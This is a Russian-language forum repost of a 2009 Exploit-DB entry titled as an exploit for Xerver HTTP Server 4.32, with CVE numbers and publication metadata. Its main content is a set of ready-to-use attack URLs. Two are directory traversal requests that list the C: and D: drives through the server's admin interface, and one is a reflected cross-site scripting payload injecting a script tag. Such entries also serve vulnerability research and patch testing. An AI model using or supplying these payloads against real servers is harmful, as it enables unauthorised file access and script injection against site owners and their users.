Exploit Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9718
Проверка EDB
  1. Пройдено
Автор
STACK
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2009-3562 cve-2009-3561
Дата публикации
2009-09-18
Код:
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability


By Stack


Directory Traversal Exploit :

http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C

http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:\




XSS Exploit :


http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>

# milw0rm.com [2009-09-18]
 
Источник
www.exploit-db.com

Похожие темы